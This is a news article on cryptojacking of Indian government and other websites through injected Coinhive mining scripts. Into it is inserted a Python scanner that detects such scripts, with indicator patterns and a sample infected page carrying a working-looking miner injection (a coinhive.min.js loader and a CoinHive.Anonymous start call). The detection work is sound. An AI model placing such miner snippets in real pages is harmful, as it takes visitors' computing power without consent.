Hackers Mined a Fortune from Indian Websites

Cryptojacking turns AP govt sites, among hundreds of others, into mining platforms

The Economic Times - Disruption: Startups & Tech - Nilesh.Christopher@timesgroup.com

Bengaluru: India might have reservations about cryptocurrencies, but government websites in the country are inadvertently helping hackers make magic internet money off of their websites. Government websites such as that of the director of municipal administration of Andhra Pradesh, Tirupati Municipal Corporation and Macherla municipality are among hundreds of Indian websites being used to mine cryptocurrencies, an analysis by security researchers shows. The malware, known as cryptojacking, is the unauthorised use of someone else’s computer to mine cryptocurrencies. Hackers either get users to click on a malicious link in an email that loads crypto mining code on the computer, or infect a website with JavaScript code that mines cryptocurrencies, using up a visitor’s computing power without consent.

“Hackers target government websites for mining cryptocurrency because those websites get high traffic and mostly people trust them,” said security researcher Indrajeet Bhuyan. “Earlier, we saw a lot of government websites getting defaced (hacked). Now, injecting cryptojackers is more fashionable as the hacker can make money.”

The vulnerabilities on the AP government websites were first identified by a team of Guwahati-based security researchers Shakil Ahmed, Anish Sarma and Bhuyan. The three websites are subdomains of ap.gov.in, which is one of the most popular websites globally with over 1,60,000 visits per month.

ET reached out to JA Chowdary, IT advisor to the chief minister of Andhra Pradesh, about the malware-affected websites on September 10. “Thanks for notifying us about the AP website hacking,” said Chowdary in a response to the alert. Mails and calls to AP IT secretary Vijay Anand remained unanswered.

However, as on September 16, the websites continue to run the scripts.

Besides government websites, the malware that mines cryptocurrencies has been spreading and affecting enterprise systems as well. PublicWWW lists over 119 Indian websites that run the Coinhive script.

Bhuyan and his team ran a software script or code on the homepages of over 4,000 websites from the goidirectory.nic.in to identify cryptojacking scripts. Many of them had been taken down without him reaching out to them.
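A homepage check of the kind described above could look like the following. This is an added example, not the researchers' script; the Coinhive indicators (script file name, constructor pattern) and the two sample pages are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
import re

# Indicators for the Coinhive in-browser miner. This list is an assumption
# of the example and is not taken from the article.
SRC_MARKERS = ("coinhive.min.js", "coinhive.com/lib")
INLINE_RE = re.compile(r"CoinHive\s*\.\s*(Anonymous|User|Token)\s*\(", re.I)


class MinerScriptFinder(HTMLParser):
    """Collects <script> tags whose src or inline body matches an indicator."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._in_script = True
        src = (dict(attrs).get("src") or "").lower()
        if any(marker in src for marker in SRC_MARKERS):
            self.findings.append(("external", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Only text inside <script> counts; page copy that merely mentions
        # the word "coinhive" is ignored.
        if self._in_script:
            match = INLINE_RE.search(data)
            if match:
                self.findings.append(("inline", match.group(0)))


def scan_homepage(html):
    """Return a list of (kind, evidence) findings for one page's HTML."""
    finder = MinerScriptFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample pages (not real site content).
CLEAN = "<html><head><script src='/js/jquery.js'></script></head><body>coinhive news</body></html>"
INFECTED = """<html><body><p>Municipal services</p>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var m = new CoinHive.Anonymous('CONSTRUCTED_SITE_KEY'); m.start();</script>
</body></html>"""
```

A site owner can feed the saved HTML of each homepage to scan_homepage and review any page that returns findings; a static check like this does not see scripts that are loaded dynamically or obfuscated.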

Globally, cryptojacking malware grew from impacting 13% of all organisations in Q4 of 2017 to 28% of companies in Q1 of 2018, more than doubling its footprint as per a recent Fortinet report.

In March, the official website of Union minister Ravi Shankar Prasad was affected by the same vulnerability where it was mining cryptocurrency Monero. The website was later fixed after it was flagged by FactorDaily.

Coinhive is one of the most popular cryptocurrency mining services and it is turning out to be profitable. A small chunk of the code installed on a website uses the computing power of any browser that visits the site to mine bits of the Monero cryptocurrency.

“Cryptojackers who manage to develop and maintain a network of hijacked computer systems are able to generate revenue with a fraction of the effort and attention caused by ransomware,” said Rajesh Maurya, regional vice-president, India and Saarc, Fortinet.

Unlike ransomware — a type of malware designed to block access to a computer until a sum of money is paid — the success of a cryptomining attack depends on not being detected.

Experts say the estimated revenue generated through cryptojacking depends on the audience, the number of systems compromised and how long people stay on a website. The more time spent while surfing on the site, the more CPU cycles that can be borrowed to mine cryptocurrencies.

“Crypto mining activity is becoming a very big business in India,” said Maurya. “This technology is most effective on illegal video-streaming websites where people stay for hours watching movies or TV series.”

The next frontier for cryptojacking is moving towards internet of things (IoT) products, say security experts. Devices like home smart speakers that are not used all through the day but have high processing power are being leveraged to mine cryptocurrencies.

A preliminary search in Shodan.io, the search engine for internet-connected devices, showed that India ranked second after Brazil with over 13,500 home routers affected by cryptojacking software.

